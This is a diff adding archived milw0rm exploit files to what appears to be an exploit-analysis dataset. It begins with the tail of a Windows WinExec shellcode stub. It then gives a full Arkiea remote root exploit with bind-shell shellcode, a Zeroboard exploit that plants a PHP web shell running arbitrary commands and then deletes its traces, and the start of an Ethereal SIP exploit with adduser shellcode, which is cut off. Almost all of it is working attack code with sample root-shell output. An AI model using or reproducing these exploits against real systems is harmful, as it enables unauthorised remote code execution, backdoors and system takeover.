+		mov dword ptr[eax],0x55555555
+		mov dword ptr[eax],0x55555555
+	getDelta:
+		pop edx							// Get shellcode/shared section pointer
+		push edx						// save edx
+		push 0x1						// push 0x0 for hidden window
+		lea eax, [edx+0x8]
+		push eax						// Command offset
+		call [edx]						// Call WinExec
+		pop edx
+		call [edx+0x4]					// Call ExitThread to avoid msiexec service to crash
+	End:
+	}
+}
+// milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_102.txt ADDED Viewed

	@@ -0,0 +1,234 @@

+/*
+ * Knox Arkiea arkiead local/remote root exploit.
+ *
+ * Portbind 5074 shellcode
+ *
+ * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
+ *
+ * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
+ * A previous request forces a large allocation of NOP's + shellcode in heap
+ * memory.  Find additional targets by searching the heap for NOP's after a
+ * crash.  safeaddr must point to any area of memory that is read/writable
+ * and won't mess with program/shellcode flow.
+ *
+ * ./ark_sink host targetnum
+ * [user@host dir]$ ./ark_sink 192.168.1.2 1
+ * [*] Connected to 192.168.1.2:617
+ * [*] Connected to 192.168.1.2:617
+ * [*] Sending nops+shellcode
+ * [*] Done, sleeping
+ * [*] Sending overflow
+ * [*] Done
+ * [*] Sleeping and connecting remote shell
+ * [*] Connected to 192.168.1.2:5074
+ * [*] Success, enjoy
+ * id
+ * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+ *
+ *
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <sys/socket.h>
+#include <sys/errno.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/nameser.h>
+#define BUFLEN		10000		/* for getshell()  		*/
+#define LEN 		280		/* overflow packet data section    */
+#define HEAD_LEN 	8		               /*  overflow packet header	*/
+#define NOP_LEN		10000		/* nop+shellcode packet 	*/
+#define ARK_PORT	617
+#define SHELL_PORT	5074
+#define NOP 		0x90
+#define NUMTARGS	2
+struct {
+	char 		*os;
+	unsigned int	targret;
+	unsigned int	targsafe;
+} targets[] = {
+	{ "Redhat 8.0", 0x80ecf90, 0x080eb940 },
+	{ "Redhat 7.2", 0x80eddc0, 0x080eb940 },
+	NULL
+};
+/* portbind 5074 */
+const char shellcode[] =
+"\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
+"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08"
+"\x8d\x4d\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14"
+"\x66\xc7\x45\x16\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14"
+"\x89\x55\x0c\xc6\x45\x10\x10\xb0\x66\xcd\x80\x40\x89\x45\x0c"
+"\x43\x43\xb0\x66\xcd\x80\x43\x89\x45\x0c\x89\x45\x10\xb0\x66"
+"\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03"
+"\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
+"\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
+unsigned int resolve(char *hostname)
+{
+	u_long 	ip = 0;
+	struct hostent	*hoste;
+	if ((int)(ip = inet_addr(hostname)) == -1)
+	{
+		if ((hoste = gethostbyname(hostname)) == NULL)
+		{
+			herror("[!] gethostbyname");
+			exit(-1);
+		}
+		memcpy(&ip, hoste->h_addr, hoste->h_length);
+	}
+	return(ip);
+}
+int isock(char *hostname, int portnum)
+{
+	struct sockaddr_in	sock_a;
+	int			num, sock;
+	unsigned int		ip;
+	fd_set			input;
+	sock_a.sin_family = AF_INET;
+	sock_a.sin_port = htons(portnum);
+	sock_a.sin_addr.s_addr = resolve(hostname);
+	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
+	{
+		herror("[!] accept");
+		exit(-1);
+	}
+	if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))
+	{
+		herror("[!] connect");
+		exit(-1);
+	}
+	fprintf(stderr, "[*] Connected to %s:%d\n", hostname, portnum);
+	return(sock);
+}
+int getshell(int sock)
+{
+	char	buf[BUFLEN];
+	int	nread=0;
+  	while(1)
+	{
+    		fd_set input;
+    		FD_SET(0,&input);
+    		FD_SET(sock,&input);
+    		select(sock+1,&input,NULL,NULL,NULL);
+		if(FD_ISSET(sock,&input))
+		{
+      			nread=read(sock,buf,BUFLEN);
+      			write(1,buf,nread);
+     		}
+     		if(FD_ISSET(0,&input))
+     			write(sock,buf,read(0,buf,BUFLEN));
+  	}
+}
+int usage(char *progname)
+{
+	int 	i;
+	fprintf(stderr, "Usage:\n./%s hostname target_num\n");
+	for (i = 0; targets[i].os; i++)
+		fprintf(stderr, "Target %d: %s\n", i+1, targets[i].os);
+	exit(-1);
+}
+int main( int argc, char **argv)
+{
+	/* first 2 bytes are a type 74 request */
+	/* last two bytes length */
+	char 		head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff";
+	char 		data[512];
+	char		sc_req[20000];
+	char		*host;
+	unsigned int		tnum;
+	unsigned int 	safeaddr;
+	unsigned int 	ret;
+	int		datalen		= LEN;
+	int		port		= ARK_PORT;
+	unsigned int	addr		= 0;
+	int		sock_overflow, sock_nops, sock_shell;
+	int 		i;
+	if (argc == 3)
+	{
+		host = argv[1];
+		tnum = atoi(argv[2]);
+		if (tnum > NUMTARGS || tnum == 0)
+		{
+			fprintf(stderr, "[!] Invalid target\n");
+			usage(argv[0]);
+		}
+	}
+	else
+	{
+		usage(argv[0]);
+	}
+	tnum--;
+	ret = targets[tnum].targret;
+	safeaddr = targets[tnum].targsafe;
+	sock_overflow = sock_nops = sock_shell = 0;
+	sock_nops = isock(host, port);
+	sock_overflow = isock(host, port);
+	// build data section of overflow packet
+	memset(data, 0x90, datalen);
+	for (i = 0; i < datalen; i += 4)
+		memcpy(data+i, (char *)&ret, 4);
+	// we overwrite a pointer that must be a valid address
+	memcpy(data+datalen-12, (char *)&safeaddr, 4);
+	// build header of overflow packet
+	datalen = ntohs(datalen);
+	memcpy(head+6, (char *)&datalen, 2);
+	// build invalid packet with nops+shellcode
+	memset(sc_req, 0x90, NOP_LEN+1);
+	memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));
+	// send invalid nop+shellcode packet
+	fprintf(stderr, "[*] Sending nops+shellcode\n");
+	write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode));
+	fprintf(stderr, "[*] Done, sleeping\n");
+	sleep(1);
+	close(sock_nops);
+	// send overflow
+	fprintf(stderr, "[*] Sending overflow\n");
+	write(sock_overflow, head, HEAD_LEN);
+	write(sock_overflow, data, LEN);
+	fprintf(stderr, "[*] Done\n");
+	fprintf(stderr, "[*] Sleeping and connecting remote shell\n");
+	sleep (1);
+	close(sock_overflow);
+	// connect to shell
+	sock_shell = isock(host, SHELL_PORT);
+	fprintf(stderr, "[*] Success, enjoy\n");
+	getshell(sock_shell);
+}
+// milw0rm.com [2003-09-20]

exploit-analyzer/exploits/exploit_1020.txt ADDED Viewed

	@@ -0,0 +1,667 @@

+/*
+*
+----------------------------------------------------------------------------------
+[+] Zeroboard preg_replace vulnerability Remote nobody shell exploit
+----------------------------------------------------------------------------------
+> by n0gada (n0gada@null2root.org)
+[*] date : 2005/5/29
+[*] the bug
+Original advisory:
+- http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
+Application
+- Zeroboard 4.1 pl2 - 4.1 pl5
+Reference:
+- http://www.nzeo.com
+[*] Target - My test server
+$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
+- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
+[+] xxx.xxx.xxx connecting ok!
+[+] Zeroboard writing . ok!
+[+] Confirmming your article - found!
+[+] Exploiting zeroboard start ............................... Done!
+[*] Confirmming your backdoor php script -
+http://xxx.xxx.xxx/zboard/data/test/shell.php is generated!
+[+] Exploiting success!!
+[*] Remove your article - ok! :)
+------------------------------------------------------------------------------
+*
+*/
+#include <stdio.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/select.h>
+#include <errno.h>
+#define BUFSIZE 4096
+#define READSIZE 1500
+void ParseZbHost(char *);
+void ConnectZboard(char *, unsigned short);
+void WriteZboard(void);
+void ExploitZboard(void);
+void ConfirmPHPScript(void);
+void DeleteArticle(void);
+void StatusProcess(void);
+void Usage(char *);
+void OutputErr(char *, int);
+char *zb_host;
+char *zb_dir;
+char *zb_tid;
+unsigned short zb_port;
+int sockfd = -1;
+int reconn=0;
+char ReadBuf[READSIZE];
+char WriteBuf[BUFSIZE];
+char TempBuf[BUFSIZ];
+char no[16];
+int main(int argc, char *argv[]){
+if(argc < 2) Usage(argv[0]);
+if(argc > 2) zb_port = atoi(argv[2]);
+else zb_port = 80;
+// http://host/bbs/zboard.php?id=test
+ParseZbHost(argv[1]);
+ConnectZboard(zb_host, zb_port);
+WriteZboard();
+ExploitZboard();
+ConfirmPHPScript();
+DeleteArticle();
+}
+void ParseZbHost(char *zbhost)
+{
+char *psbuf;
+char *sptr=NULL;
+char *eptr=NULL;
+psbuf = malloc(strlen(zbhost)+1);
+strcpy(psbuf, zbhost);
+if((sptr = strstr(psbuf,"http://")) == NULL) OutputErr("http://host need\n", 0);
+zb_host = sptr+7;
+sptr = strchr(zb_host, '/');
+sptr[0] = '\0';
+sptr++;
+if((eptr = strstr(sptr, "zboard.php?id=")) == NULL) OutputErr("\"zboard.php?id=\"
+need\n", 0);
+zb_tid = eptr+14;
+eptr--;
+eptr[0] = '\0';
+zb_dir = sptr;
+fprintf(stdout, " - Target : http://%s/%s/zboard.php?id=%s\n", zb_host, zb_dir,
+zb_tid);
+fflush(stdout);
+}
+void ConnectZboard(char *server, unsigned short port)
+{
+struct sockaddr_in serv;
+struct hostent *hostname;
+if(!(hostname = gethostbyname(server))) OutputErr(server, 1);
+if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) OutputErr("socket", 1);
+memset(&serv, 0, sizeof(serv));
+serv.sin_family = AF_INET;
+serv.sin_port = htons(port);
+serv.sin_addr.s_addr = *((unsigned long *)hostname->h_addr_list[0]);
+// serv.sin_addr = *((struct in_addr *)hostname->h_addr_list[0]);
+if(connect(sockfd, (struct sockaddr *)&serv, sizeof(struct sockaddr)) < 0)
+OutputErr("connect", 1);
+if(!reconn) fprintf(stdout,"\n [+] %s connecting ok!\n", server);
+else if(reconn == 1) fprintf(stdout, " [+] %s reconnecting ok!\n", server);
+fflush(stdout);
+reconn = 0;
+}
+void WriteZboard(void)
+{
+fd_set fds;
+struct timeval tv;
+int err = -1;
+int i = 0;
+int cnt=0;
+char *tmp_ptr, *ptr;
+char form_data[BUFSIZE];
+memset(form_data, 0, sizeof(form_data));
+sprintf(form_data,
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"page\"\r\n"
+"\r\n"
+"1\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"id\"\r\n"
+"\r\n"
+"%s\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"no\"\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"select_arrange\"\r\n"
+"\r\n"
+"headnum\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"desc\"\r\n"
+"\r\n"
+"asc\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"page_num\"\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"keyword\"\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"category\"\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"sn\"\r\n"
+"\r\n"
+"off\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"ss\"\r\n"
+"\r\n"
+"on\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"sc\"\r\n"
+"\r\n"
+"on\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"mode\"\r\n"
+"\r\n"
+"write\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"password\"\r\n"
+"\r\n"
+"1212\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"name\"\r\n"
+"\r\n"
+"zero\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"email\"\r\n"
+"\r\n"
+"zero@nzeo.com\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"homepage\"\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"subject\"\r\n"
+"\r\n"
+"zero@nzeo.com hi~!\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"memo\"\r\n"
+"\r\n"
+"`mv data/%s/d214924151d9e1ffac5bb2258561031e
+data/%s/shell.php`;# 70ab423bfaea846c9db0b96126254103\r\n"
+//"-----------------------------8ac34985126d8\r\n"
+//"Content-Disposition: form-data; name=\"sitelink1\"\r\n"
+//"\r\n"
+//"\r\n"
+//"-----------------------------8ac34985126d8\r\n"
+//"Content-Disposition: form-data; name=\"sitelink2\"\r\n"
+//"\r\n"
+//"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"file1\";
+filename=\"d214924151d9e1ffac5bb2258561031e\"\r\n"
+"Content-Type: text/plain\r\n"
+"\r\n"
+"<?
+if(count($_GET)) extract($_GET);
+if(count($_POST)) extract($_POST);
+if(count($_SERVER)) extract($_SERVER);
+echo \"<form action=$PHP_SELF method=post>
+command : <input type=text name=cmd>
+<input type=submit></form><hr>\";
+if($cmd){
+$cmd = str_replace(\"\\\\\", \"\", $cmd);
+echo \"<pre>\"; system($cmd); echo \"</pre>\";
+}
+?>\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"file2\"; filename=\"\"\r\n"
+"Content-Type: application/octet-stream\r\n"
+"\r\n"
+"\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"x\"\r\n"
+"\r\n"
+"36\r\n"
+"-----------------------------8ac34985126d8\r\n"
+"Content-Disposition: form-data; name=\"y\"\r\n"
+"\r\n"
+"11\r\n"
+"-----------------------------8ac34985126d8--\r\n"
+, zb_tid, zb_tid, zb_tid);
+memset(WriteBuf, 0, sizeof(WriteBuf));
+sprintf(WriteBuf,
+"POST /%s/write_ok.php HTTP/1.1\r\n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
+application/x-shockwave-flash, application/vnd.ms-excel,
+application/vnd.ms-powerpoint, application/msword, */*\r\n"
+"Referer: http://%s/%s/write.php?id=%s&page=1&sn1=&divpage=1&
+sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=&
+mode=write&sn1=&divpage=1\r\n"
+"Content-Type: multipart/form-data; boundary=---------------------------8ac34985126d8\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
+"Host: %s\r\n"
+"Content-Length: %d\r\n"
+"Connection: Keep-Alive\r\n"
+"Cache-Control: no-cache\r\n"
+"\r\n""%s", zb_dir, zb_host, zb_dir, zb_tid, zb_host, strlen(form_data), form_data);
+fprintf(stdout, " [+] Zeroboard writing ");
+fflush(stdout);
+if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
+tv.tv_sec = 60;
+tv.tv_usec = 0;
+FD_ZERO(&fds);
+for(;;){
+memset(ReadBuf, 0, sizeof(ReadBuf));
+if(i!=0xb33f) StatusProcess();
+FD_SET(sockfd, &fds);
+if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
+if(FD_ISSET(sockfd, &fds)){
+if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
+if(strstr(ReadBuf, "HTTP/1.1 ")){
+if(strstr(ReadBuf+17, "Connection: close\r\n")) reconn = 1;
+if(strstr(ReadBuf+9, "200 OK\r\n")) {
+err++;
+}
+else if(strstr(ReadBuf+9, "404 Not Found\r\n")){
+OutputErr(" failed!(page not found)\n", 0);
+}
+else if(strstr(ReadBuf+9, "400 Bad Request\r\n")){
+OutputErr(" failed!(Bad Request)\n", 0);
+}
+else {
+OutputErr(ReadBuf, 0);
+}
+}
+if(err == 0){
+if(strstr(ReadBuf,"<meta http-equiv=\"refresh\" content=\"0; url=zboard.php?id="))
+{
+fprintf(stdout, " ok!\n");
+fflush(stdout);
+fprintf(stdout," [+] Confirmming your article");
+fflush(stdout);
+if(tmp_ptr = strstr(ReadBuf+18, "url=")) {
+ptr = tmp_ptr+4;
+if(ptr != NULL){
+if(tmp_ptr = strchr(ptr,'"')) tmp_ptr[0] = '\0';
+}
+}
+if(ptr = strstr(ReadBuf,"=&no=")){
+ptr += 5;
+memset(no, 0, sizeof(no));
+for(i=0; i<16; i++){
+if(ptr[i] == '&') break;
+no[i] = ptr[i];
+}
+}
+if(strlen(no) > 0){
+fprintf(stdout," - found!\n");
+fflush(stdout);
+return;
+}
+else {
+OutputErr(" - failed!(not writed!?!)\n", 0);
+}
+}
+else {
+if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf,"\x30\x0d\x0a\x0d\x0a")) break;
+}
+}
+else {
+OutputErr("err number error\n", 0);
+}
+}
+}
+fprintf(stderr, " error!\n");
+}
+void ExploitZboard(void)
+{
+fd_set fds;
+struct timeval tv;
+int err = -1;
+if(reconn == 1) ConnectZboard(zb_host, zb_port);
+memset(WriteBuf, 0, sizeof(WriteBuf));
+sprintf(WriteBuf,
+"GET /%s/view.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&
+sc=on&keyword=70ab423bfaea846c9db0b96126254103/e"
+, zb_dir, zb_tid);
+memcpy(WriteBuf+strlen(WriteBuf), "\x25\x30\x30", 3);
+sprintf(WriteBuf+strlen(WriteBuf),
+"&select_arrange=headnum&desc=asc&no=%s HTTP/1.1\r\n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
+application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
+"Referer: http://%s/%s/zboard.php\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
+"Host: %s\r\n"
+"Connection: Keep-Alive\r\n"
+"\r\n", no, zb_host, zb_dir, zb_host);
+fprintf(stdout, " [+] Exploiting zeroboard start ");
+fflush(stdout);
+if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
+tv.tv_sec = 60;
+tv.tv_usec = 0;
+FD_ZERO(&fds);
+for(;;){
+StatusProcess();
+memset(ReadBuf, 0, sizeof(ReadBuf));
+FD_SET(sockfd, &fds);
+if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
+if(FD_ISSET(sockfd, &fds)){
+if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
+if(strstr(ReadBuf, "HTTP/1.1 ")){
+if(strstr(ReadBuf,"Connection: close\r\n")) reconn = 1;
+if(strstr(ReadBuf+9, "200 OK\r\n")) {
+err++;
+}
+else if(strstr(ReadBuf+9, "404 Not Found\r\n")){
+OutputErr(" failed!(page not found)\n", 0);
+}
+else if(strstr(ReadBuf+9, "400 Bad Request\r\n")){
+OutputErr(" failed!(Bad Request)\n", 0);
+}
+else {
+OutputErr(ReadBuf, 0);
+}
+}
+if(err >= 0){
+if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf, "\x30\x0d\x0a\x0d\x0a")){
+fprintf(stdout," Done!\n");
+fflush(stdout);
+return;
+}
+}
+}
+}
+fprintf(stderr," error!\n");
+}
+void ConfirmPHPScript(void)
+{
+fd_set fds;
+struct timeval tv;
+if(reconn == 1) ConnectZboard(zb_host, zb_port);
+memset(WriteBuf, 0, sizeof(WriteBuf));
+sprintf(WriteBuf,
+"GET /%s/data/%s/shell.php HTTP/1.1\r\n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
+application/x-shockwave-flash, application/vnd.ms-excel,
+application/vnd.ms-powerpoint, application/msword, */*\r\n"
+"Referer: http://%s/%s/zboard.php\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
+"Host: %s\r\n"
+"Connection: Keep-Alive\r\n"
+"\r\n", zb_dir, zb_tid, zb_host, zb_dir, zb_host);
+fprintf(stdout, " [*] Confirmming your backdoor php script");
+fflush(stdout);
+if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
+tv.tv_sec = 60;
+tv.tv_usec = 0;
+FD_ZERO(&fds);
+for(;;){
+memset(ReadBuf, 0, sizeof(ReadBuf));
+FD_SET(sockfd, &fds);
+if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
+if(FD_ISSET(sockfd, &fds)){
+if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
+if(strstr(ReadBuf, "HTTP/1.1 ")){
+if(strstr(ReadBuf,"Connection: close\r\n")) reconn = 1;
+if(strstr(ReadBuf+9, "200 OK\r\n")) {
+fprintf(stdout," - http://%s/%s/data/%s/shell.php is generated!\n
+[+] Exploiting success!!\n", zb_host, zb_dir, zb_tid);
+fflush(stdout);
+return;
+}
+else if(strstr(ReadBuf+9, "404 Not Found\r\n")){
+OutputErr(" - page not found\n - 'mv' instruction permission denied.\n - zeroboard was patched.\n"
+" [-] Exploit failed!\n", 0);
+}
+else if(strstr(ReadBuf+9, "400 Bad Request\r\n")){
+OutputErr(" - Bad Request\n"
+" [-] Exploit failed!\n", 0);
+}
+else {
+OutputErr(ReadBuf, 0);
+}
+}
+}
+}
+fprintf(stderr," error!\n");
+}
+void DeleteArticle(void)
+{
+fd_set fds;
+struct timeval tv;
+char post_data[BUFSIZ];
+if(reconn == 1) ConnectZboard(zb_host, zb_port);
+sprintf(post_data,
+"page=1&id=%s&no=%s&select_arrange=headnum&desc=asc&page_num=20&keyword=&category=&sn=off&ss=off&sc=on&mode=&c_no=&password=1212&x=20&y=9\r\n", zb_tid, no);
+memset(WriteBuf, 0, sizeof(WriteBuf));
+sprintf(WriteBuf,
+"POST /%s/delete_ok.php HTTP/1.1\r\n"
+"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
+"Referer: http://%s/%s/delete.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&sc=on&select_arrange=headnum&desc=asc&no=%s\r\n"
+"Content-Type: application/x-www-form-urlencoded\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
+"Host: %s\r\n"
+"Content-Length: %d\r\n"
+"Connection: close\r\n"
+"Cache-Control: no-cache\r\n"
+"\r\n"
+"%s", zb_dir, zb_host, zb_dir, zb_tid, no, zb_host, strlen(post_data), post_data);
+fprintf(stdout, " [*] Remove your article ");
+fflush(stdout);
+if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
+tv.tv_sec = 60;
+tv.tv_usec = 0;
+FD_ZERO(&fds);
+for(;;){
+memset(ReadBuf, 0, sizeof(ReadBuf));
+FD_SET(sockfd, &fds);
+if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
+if(FD_ISSET(sockfd, &fds)){
+if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
+if(strstr(ReadBuf, "HTTP/1.1 ")){
+if(strstr(ReadBuf+9, "200 OK\r\n")) {
+if(strstr(ReadBuf+17, "<meta http-equiv=\"refresh\" content=\"0; url=zboard.php?id=")) {
+fprintf(stdout, " - ok! :)\n");
+fflush(stdout);
+return;
+}
+else{
+break;
+}
+}
+else if(strstr(ReadBuf+9, "404 Not Found\r\n")){
+OutputErr(" - failed!(page not found)\n", 0);
+}
+else if(strstr(ReadBuf+9, "400 Bad Request\r\n")){
+OutputErr(" - failed!(Bad Request)\n", 0);
+}
+else {
+fprintf(stderr,"%s", ReadBuf);
+exit(1);
+}
+}
+}
+}
+fprintf(stderr," error!\n");
+}
+void StatusProcess(void)
+{
+putchar('.');
+fflush(stdout);
+}
+void OutputErr(char *msg, int type)
+{
+if(!type){
+fprintf(stderr,"%s", msg);
+fflush(stderr);
+}
+else if(type==1){
+if(!strcmp(msg, zb_host)) herror(msg);
+else perror(msg);
+}
+DeleteArticle();
+exit(1);
+}
+void Usage(char *arg)
+{
+fprintf(stderr,"[*] Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada\n");
+fprintf(stderr,"--------------------------------------------------------------------------\n");
+fprintf(stderr,"Usage: %s <SERVER> [PORT - default : 80] \n", arg);
+fprintf(stderr,"--------------------------------------------------------------------------\n");
+exit(1);
+}
+// milw0rm.com [2005-05-31]

exploit-analyzer/exploits/exploit_1021.txt ADDED Viewed

	@@ -0,0 +1,200 @@

+/* tethereal_sip.c (now quite functional)
+*
+* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
+*
+* Advisory:
+* http://www.ethereal.com/appnotes/enpa-sa-00019.html
+*
+* produced by Team W00dp3ck3r:
+* frauk\x41iser
+* mag00n
+* s00n
+* thorben
+*
+* Notes:
+* tested on Debian Sarge
+* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
+*
+* tested version of ethereal:
+* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
+* (./configure, make, make install ;))
+*
+* victim has to switch from normal user to root using "su -"
+* the exploit adds a user named "su" with password "su" on the victim host
+*
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netdb.h>
+#include <netinet/in.h>
+unsigned char sip_header[] =
+"\x4f\x50\x54\x49\x4f\x4e\x53\x20\x73\x69\x70\x3a\x68\x61\x63"
+"\x6b\x20\x53\x49\x50\x2f\x32\x2e\x30\x0a\x56\x69\x61\x3a\x20"
+"\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x63\x70\x63"
+"\x31\x2d\x6d\x61\x72\x73\x31\x2d\x33\x2d\x30\x2d\x63\x75\x73"
+"\x74\x32\x32\x35\x2e\x6d\x69\x64\x64\x2e\x63\x61\x62\x6c\x65"
+"\x2e\x6e\x74\x6c\x2e\x63\x6f\x6d\x3a\x35\x35\x31\x31\x38\x3b"
+"\x72\x70\x6f\x72\x74\x0d\x0a\x56\x69\x61\x3a\x20\x53\x49\x50"
+"\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x68\x61\x63\x6b\x3a\x39"
+"\x0a\x46\x72\x6f\x6d\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b"
+"\x3b\x74\x61\x67\x3d\x36\x31\x35\x61\x65\x37\x37\x30\x0a\x54"
+"\x6f\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b";
+unsigned char callid[] =
+"\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20";
+/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into
+2 parts because one buffer was too small. thx to http://metasploit.com */
+unsigned char shellcode[] =
+"\x31\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
+"\xb7\x95\xbb\x83\xeb\xfc\xe2\xf4\x94\x7e\x1c\x70\xcf\xf1\xcd\x76"
+"\x25\xdd\x90\xe3\x94\x7e\xc4\xd3\xd6\xc4\xe2\xdf\xcd\x98\xba\xcb"
+"\xc4\xdf\xba\xde\xd1\xd4\x1c\x58\xe4\x02\x91\x76\x25\x24\x7d\x9b"
+"\xa5\xb7\x95\xc8\xd0\x8d\xd4\xfa\xdf\xf2\xac\xd4\xd4\xf9\xdd\xed"
+"\xf5\x82\xe6\x81\x95\x8d\xa5\x81\x9f\x98\xaf\x94\xc7\xde\xfb\x94"
+"\xd6\xdf\x9f\xe2\x2e\xe6";
+unsigned char cseq[] =
+"\x0a\x43\x53\x65\x71\x3a\x20";
+/* the malformed cseq method field. the buffer has a size of 16 byte. you need
+48 byte to overwrite the return address. the first byte is checked isalpha(),
+so we splitted the shellcode in a way that the first char of cseq_method passes
+the isalpha() check. */
+unsigned char cseq_method[] =
+"\x69\xd1\xa1\xef\x58\x3b\xcf\xb6\xcd\x76\x25\xb7\x95\xbb";
+/* needed to be a fully valid sip packet */
+unsigned char sip_footer[] =
